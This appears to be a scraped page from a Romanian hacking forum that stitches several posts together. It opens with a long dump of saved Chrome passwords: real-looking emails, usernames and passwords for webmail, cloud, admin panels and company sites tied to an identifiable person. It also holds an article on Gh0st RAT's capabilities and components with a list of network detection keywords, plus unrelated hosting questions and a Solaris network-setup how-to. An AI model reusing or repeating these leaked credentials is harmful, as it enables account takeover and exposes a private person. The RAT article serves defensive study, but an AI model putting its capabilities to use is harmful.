Application: Google Chrome Host: https://frontify.com/signup/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://blue.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://www.dropbox.com/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://highlands-ost...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://login.yahoo.com/config/login Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: http://www.grupo-max...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://hsv1.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://www.odesk.com/login Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://t3.bluepoint-...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.guia-activos.eu/ Username: cburger Password: malaga Application: Google Chrome Host: https://www.goetzfri...om/template.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://jomclassified...orum/index.html Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://helpdesk.blue...index.php/login Username: agent1 Password: agent1 Application: Google Chrome Host: http://www.dmxzone.c...free-extension/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.dmxzone.c...free-extension/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://verein.bluepo...nstallation.php Username: admin Password: lz639ad Application: Google Chrome Host: http://www.sxc.hu/browse.phtml Username: chrioll Password: mco727865 Application: Google Chrome Host: http://demo.joombri.in/ Username: freelancer Password: password Application: Google Chrome Host: http://81.169.181.15.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.processon.com/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://helpdesk.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://bootsnipp.com/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://open.bluepoint-service.at/ Username: chrioll@gmail.com Password: i41B4fo Application: Google Chrome Host: http://demo.joomlacontenteditor.net/ Username: demo Password: demo Application: Google Chrome Host: http://www.w-b-s.net/ Username: grupomaximus Password: ifnok5gfU0! Application: Google Chrome Host: http://webmail.binarydigit.at/ Username: chris@wasser-rettung.net Password: mco727865 Application: Google Chrome Host: https://communicator...com/ox6/ox.html Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://login.micros...e.com/login.srf Username: chris@formfinder.at Password: Sarese12!? Application: Google Chrome Host: https://www.joomlapolis.com/index.php Username: chrioll1965 Password: Sarese12! Application: Google Chrome Host: http://www.joomlacke...ead-more-button Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://localhost/hosting/install.php Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://grupomaximus...cloudforge.com/ Username: cburger1 Password: Sarese12! Application: Google Chrome Host: http://www.yeedeen.c...in-registration Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.gfxtra1.net/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://culinaria-vor.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://owncloud.bony-club.eu/ Username: cburger Password: i&~8rN?2qpe( Application: Google Chrome Host: http://joomlacode.org/gf/account/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.bootply.com/CGj9cyTZwX Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://icomoon.io/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1....der/pages/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.stockphot...rfree.com/join/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://front.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.kareebu.com/register Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://localhost/wp/...min/install.php Username: chris Password: Sarese12! Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: admin Application: Google Chrome Host: http://owncloud.bluepoint-service.at/ Username: desiree Password: Sarese12! Application: Google Chrome Host: https://www.dropbox.com/account Username: chrioll@me.com Password: Sarese12! Application: Google Chrome Host: https://accounts.google.com/SignUp Username: mariavolperowain Password: MaRiA2014! Application: Google Chrome Host: http://www.seblod.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://85.214.78.91/...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://t3.bluepoint-.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://portal.bony-c.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.ms-office.../attachment.php Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.etengo.d...ojektliste.jspx Username: burger1 Password: Sarese12! Application: Google Chrome Host: https://www.xing.com...rian_Taciulescu Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://test.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.grupo-max...rator/index.php Username: 11631 Password: malaga Application: Google Chrome Host: http://forum.zhuk.cc...omponent/users/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.testlink...atest/login.php Username: admin Password: admin Application: Google Chrome Host: http://de.skill.gameforge.com/landing/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://data.formfinder.at/ Username: editor Password: ffedit43 Application: Google Chrome Host: http://www.astemplates.com/signin Username: grupomaximus Password: 0zin3tS0 Application: Google Chrome Host: http://panopanda.co/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://webmail.wasser-rettung.net/ Username: chris@wasser-rettung.net Password: mco727865 Application: Google Chrome Host: http://open.bluepoin...anel/auth/login Username: chrioll@gmail.com Password: i41B4fo Application: Google Chrome Host: http://ordasoft.com/...sk,advregister/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://goomaxx1.blue...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://81.169.181.153/ Username: grupomaximus Password: ifnok5gfU0! Application: Google Chrome Host: https://login.skype.com/login Username: live:christian.b_17 Password: mco727865 Application: Google Chrome Host: http://jsfiddle.net/user/login/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://clicky.com/user/register Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.jomclass...index.php/login Username: demo Password: demo Application: Google Chrome Host: http://test2.bluepoi...gistration-form Username: hansi Password: 1234567890 Application: Google Chrome Host: http://helpdesk.blue...rvice.at/admin/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://developers.phpjunkyard.com/ Username: php Password: php Application: Google Chrome Host: http://oclass.bluepo...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://forums.osclass.org/activate/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://bluepoint.blu.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://mygully.com/t...-1-3-a-2760461/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://verein.bluepo...profile_new.php Username: admin Password: lz639ad Application: Google Chrome Host: http://sales.grupo-m...views/Anmelden/ Username: office Password: romulus2014top Application: Google Chrome Host: http://www.processon.com/signup/bind Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://quirktools.com/me/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-culi...e/single-advert Username: demo Password: demo Application: Google Chrome Host: http://85.214.78.91/.../administrator/ Username: admin Password: bony.club Application: Google Chrome Host: http://link.samsung.com/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net.../wiki/index.php Username: Cburger Password: chris2014 Application: Google Chrome Host: http://goomaxx.bluep...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost:8080/ Username: tomcat Password: s3cret Application: Google Chrome Host: http://www.xing.com/de Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://www.joomlic.c.../identification Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db7 Password: Sarese12! Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db6 Password: r2TlEv6 Application: Google Chrome Host: http://www.schiessen-lienz.at/ Username: hsv Password: 2014schiessen Application: Google Chrome Host: https://www.akeebaba...m/download.html Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.schiessen...index.php/login Username: admin Password: Sarese12! Application: Google Chrome Host: https://store.steampowered.com/join/ Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: https://boerse.to/ Username: chrisburg Password: O8-s5Q31 Application: Google Chrome Host: http://www.easyname.com/de Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://bitbucket.org/account/signin/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.psd-tutor...-oeffnen.93438/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.schiessen.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://iface.ff.lan/user/login/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://communicator....de/ox6/ox.html Username: c.burger@bony-club.eu Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi...rator/index.php Username: florian Password: florian2014 Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.joomlackeditor.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://master-solut...cloudforge.com/ Username: cburger_bc Password: NqzwOWVGS8 Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://login.live.com/login.srf Username: christian.b@bluepoint-service.at Password: mco727865 Application: Google Chrome Host: http://iface.ff.lan/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://community.sp...com/login/login Username: office@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://webmail.easyname.com/ Username: 9400mail6 Password: Sarese12! Application: Google Chrome Host: https://webmail.easyname.com/ Username: 9400mail3 Password: sarese12 Application: Google Chrome Host: http://klagusch-sl.c...rator/index.php Username: Klaus - MAXiMUS Password: Oliver3977Lukas Application: Google Chrome Host: http://www.klagusch-...rator/index.php Username: Klaus - MAXiMUS Password: Oliver3977Lukas
- 1 reply
-
- application
- chrome
-
(and 3 more)
Tagged with:
-
Am host de vreo 2 luni si ceva de la hostblast si nu sunt multumit deloc de ei,imi cad site-urile foarte des..imi puteti da o idee?un host bun si la pret sa fie ok?acum nu sariti cu gura,nu vreau neaaparat un host care sa platesc 6$ pe an..dar totusi.Si as vrea un host care sa pot face plata prin payoneer,pentru ca nu am alte metode de plata...
-
In this article series, we will learn about one of the most predominant malware, named Gh0st RAT, whose source code is dated back to 2001 but it is still relevant today. In this article series, we will learn what exactly is Gh0st RAT, all its variants, how it works, its characteristics, etc. What is Gh0st RAT? Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth. Gh0st RAT capabilities I think that before I delve into more technical details of Gh0st RAT, let us take a brief look at the capabilities or reach of Gh0st RAT. Below is a list of Gh0st RAT capabilities. Gh0st RAT can: Take full control of the remote screen on the infected bot. Provide real time as well as offline keystroke logging. Provide live feed of webcam, microphone of infected host. Download remote binaries on the infected remote host. Take control of remote shutdown and reboot of host. Disable infected computer remote pointer and keyboard input. Enter into shell of remote infected host with full control. Provide a list of all the active processes. Clear all existing SSDT of all existing hooks. Gh0st RAT Components This section will throw light on both at user and kernel level binaries of the Gh0st RAT toolset. Gh0st RAT has two main components: client and server. Controller Application: This is known as client, which is typically a Windows application that is used to track and manage Gh0st servers on remote compromised hosts. The two main functions this module serves is the management and control of Gh0st servers and the ability to create customized server install programs. Windows DLL (user level binary): The DLL is named SVCHOST.DLL. It is the Windows DLL that gets installed on a compromised host as a Windows service. This service is the server component of the Gh0st toolkit. It checks in to the Gh0st client on startup and awaits instructions. The setup and installation of this DLL as a service is done by the install program (Dropper) SERVER.EXE which we will discuss in a short while. INSTALL.EXE Dropper application is used to install SVCHOST.DLL. This is a stand-alone Windows application that contains all required code to prepare a compromised host for the installation of the Gh0st RAT server service and the launching of that service. Kernel Level Binary: This is present in the toolset with the .SYS filename RESSDT.SYS. This is a very small device driver that performs a single task: resetting the Windows System Service Dispatch Table (SSDT). This is the only kernel level binary in the toolset. It runs at system startup on the compromised host and removes all hooks in the SSDT. Install Program: This is commonly called “the dropper.” It contains the two above described binaries and performs all of the work necessary to install the Gh0st server on a host and startup the Gh0st service. Gh0st RAT Variants Since Gh0st Rat source code is available for everyone, Gh0st Rat has many versions available, as people have generally used and even modified the code to fit their purpose. Gh0st, because of its number of variants and encrypted capabilities, is hard to recognize. Most antivirus detections today are automatically generated, resulting in names thought out by machines. Quick, but containing information only machines find interesting. The most stable indicator of being faced with a Gh0stRat is its network communication. It is well documented and quite distinctive, as it always begins with a “magic word” which in its default configuration is “Gh0st” – thus Gh0st Rat. As one can imagine, the detection of the “Gh0st” keyword in the network stream is pretty easy, as tools like Network Intrusion Prevention System (NIPS) or even Wireshark magic words are easily available in the fixed length of 5 bytes. So the below key words are from the investigations guide that contains all the magic words from a Gh0st Network stream: “7hero, Adobe, B1X6Z, BEiLa, BeiJi, ByShe, FKJP3, FLYNN, FWAPR, FWKJG,GWRAT, Gh0st, GOLDt, HEART, HTTPS, HXWAN, Heart, IM007, ITore, KOBBX, KrisR, LUCKK, LURK0, LYRAT, Level, Lover, Lyyyy, MYFYB, MoZhe, MyRat, OXXMM, PCRat, QWPOT, Spidern, Tyjhu, URATU, W0LFKO, Wangz, Winds, World, X6RAT, XDAPR, Xjjhj, ag0ft, attac, cb1st, https, whmhl, xhjyk, 00000, ABCDE, apach, Assas, Blues, chevr, CHINA, cyl22, DrAgOn EXXMM,Eyes1, Gi0st, GM110, Hello, httpx, kaGni, light, LkxCq, lvxYT, Naver, NIGHT, NoNul, Origi, QQ_124971919, Snown, SocKt, Super, Sw@rd, v2010, VGTLS, wcker, Wh0vt, wings, X6M9K, xqwf7, YANGZ” The above is not an exhaustive list, and even magic keywords like “Spidern” and “W0LFKO” come with non-standard length of 5 bytes. Other irregular magic keywords like “DrAgOn” and “QQ_124971919? do not even compress their network traffic like most other Gh0st do. In the next article of this series, we will learn about Gh0st network connections, why it is difficult to control this type of attack, and what are the possible solutions for its control that can be put in place. References http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf http://www.mcafee.com/in/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf Source
-
Noroc, acum 2 saptamani am luat 1 domeniu + host de la one.com (gratuit pe 1 an de zile) Acum nu il mai vreau, vroiam sa fac ceva cu el dar m-am razgandit, deci cine doreste ofer domeniul + host Travian-Infinity (cu tot cu scriptul de pe el, trebuie doar instalat / configurat)_ in schimbul altui domeniu + host (cu numele dorit de mine, tot pe 1 an). cine doreste sa-mi dea PM Edit : Cine nu e interesat il rog sa nu posteze aiurea doar pentru a face + 1
-
In acest HowTo voi descrie pasii care trebuie facuti pentru configurarea retelei folosind o adresa ip statica intrun sistem Unix/Solaris. Majoritatea comenzilor care fac parte din smf pot fi folosite incepand cu versiunile 9,10,11 de Solaris In Unix totul este un fisier si aceasta regula sper ca multi au imprimat-o deja prin creier si precum stiti deja pentru a face orice fel de setari trebuie modificate fisiere pe care le putem defini fisiere de configurare.Datele stocate in aceste fisiere vor fi citite de catre sistem si executate.Pana aici sper sa aveti o idee clara despre cum functioneaza un sistem Unix in privinta fisierelor. Pentru a configura o interfata de retea cu un ip static vor trebui create cateva fisiere.Numele unei interfete de retea deriva din numele driverului care piloteaza interfata + numarul interfetei (0) fiind prima interfata (1) fiind a doua interfata.Datele necesare pentru a configura interfata de retea fiind: -Adresa ip (192.168.123.105) -Adresa de subnet + Netmask (192.168.123.0 255.255.255.0) -Un nume de host (eclipse) -Un gateway (192.168.123.254) -Unul sau mai multe nameservere (192.168.123.254) Se presupune ca ambientul unde se va face configurarea foloseste un router care are functia de gateway pentru a iesi pe internet. Se presupune ca driverul pentru interfata de retea este instalat si vine recunoscuta de catre sistem [eclipse]# dladm show-dev nfo0 link: unknown speed: 100 Mbps duplex: unknown Se presupune ca interfata de retea este deja in statul enabled ifconfig nfo0 plumb up Note: Aceste exemple le-am folosit pentru configurarea unui host intern din reteaua mea, adresele ip vor trebui schimbate in baza range-urile si claselor de ip interne pe care le aveti. Interfata de retea pe care o voi configura in exemplele urmatoare este nfo0 nfo fiind driverul pe care o piloteaza iar valoarea (0) fiind numarul interfetei(prima interfata de retea a acestui sistem) Note: O mica observatie ar fi faptul ca lo0 are tot valoarea 0 dar este prima interfata de loopback.E normal sa nu fie catalogata ca 1 deoarece nu are nici o treaba cu interfata fizica asadar nu este a doua interfata din sistem ci tot prima interfata dar nu fizica. Presupunem totusi faptul ca initial sistemul foloseste DHCP pentru a avea o adresa ip.In acest caz va exista in sistem urmatorul fisier /etc/dhcp.nfo0 Un fisier gol fara nici o data dar cu o valoare importanta deoarece existenta lui va face in asa fel incat agentul DHCP sa ruleze in sistem. Pentru solaris 10 se poate verifica acest lucru folosind comenzile smf svcs -a | grep -i agent disabled 0:37:32 svc:/application/management/common-agent-container-1: default Note: In cazul in care fisierul /etc/dhcp.nfo0 exista , va rula si common-agent-container asadar va fi online si nu disabled. Pentru a trece la o configurare statica va trebui eliminat acest fisier /etc/dhcp.nfo0 daca exista,mentionez faptul ca de default nu exista si ca interfata de retea trebuie configurata in oricecaz manual chiar daca in mod static sau dinamic. O data ce am stabilit si facut aceste verificari se poate incepe configurarea statica. Cum am mai spus aceasta procedura comporta configurarea unor fisiere sau mai bine zis introducerea unor date in cateva fisiere. Primul fisier care trebuie creat este fisierul interfetei de retea care va contine adresa de ip statica pe care o vom configura. echo "192.168.123.105" > /etc/hostname.nf0 Al doilea fisier este /etc/netmasks unde vom introduce urmatoarele date .Adresa subnetului si adresa netmask echo "192.168.123.0 255.255.255.0" >> /etc/netmasks Al treilea fisier care trebuie creat este /etc/defaultrouter care va detine gateway-ul echo "192.168.123.254" > /etc/defaultrouter Al patrulea fisier care vine creat este /etc/defaultdomain cu numele de host echo "eclipse" > /etc/defaultdomain Un alt fisier in care va fi polulat cu date este /etc/hosts echo "192.168.123.105 eclipse" >> /etc/hosts Vom specifica intrun fisier si serverurile dns pentru conexiune.Nameserver-ul poate fi adresa de gateway sau daca exista adresa unui nameserver divers echo "nameserver 192.168.123.254" > /etc/resolv.conf Ultimul fisier care trebuie configurat este /etc/nsswitch.conf si are o importanta foarte mare deoarece fara directiva corecta specificata in acest fisier nu veti reusi sa faceti name solving. In primul rand daca acest fisier nu exista in /etc/nsswitch.conf poate fi luata o copie din /etc/nsswitch.files Important insa este ca urmatoarea directiva sa fie specificata hosts: dns files De obice de default va fi doar hosts: files O data configurate aceste optiuni se poate face restart la network [eclipse]# svcs -a | grep physical online 13:50:12 svc:/network/physical:default [eclipse]# svcadm restart svc:/network/physical:default Un simplu ifconfig va demonstra faptul ca nu folosim un server DHCP pentru atribuirea unei adrese ip. [eclipse]# ifconfig -a lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000 nfo0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 192.168.123.105 netmask ffffff00 broadcast 192.168.123.255 ether 0:x:xx:xx:xx:xx Note: In momentul in care ip-ul vine atribuit de catre un server DHCP ,ifconfig va arata urmatorul output [eclipse]# ifconfig -a alo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000 nfo0: flags=1004843<UP,BROADCAST,RUNNING,MULTICAST,[COLOR="#FF0000"]DHCP[/COLOR],IPv4> mtu 1500 index 2 inet 192.168.123.105 netmask ffffff00 broadcast 192.168.123.255 ether x:x:xx:xx:xx:xx Se poate verifica si tabela de routing pentru a intelege mai bine daca totul a fost configurat bine. [eclipse]# netstat -rn Routing Table: IPv4 Destination Gateway Flags Ref Use Interface -------------------- -------------------- ----- ----- ---------- --------- default 192.168.123.254 UG 1 225 192.168.123.0 192.168.123.105 U 1 15 nfo0 127.0.0.1 127.0.0.1 UH 1 64 lo0 Happy static internet navigation!!!
-
- 1
-
- host
- nameserver
- (and 4 more)
-
Care este cel mai sigur si mai rapid hosting pe care il stiti?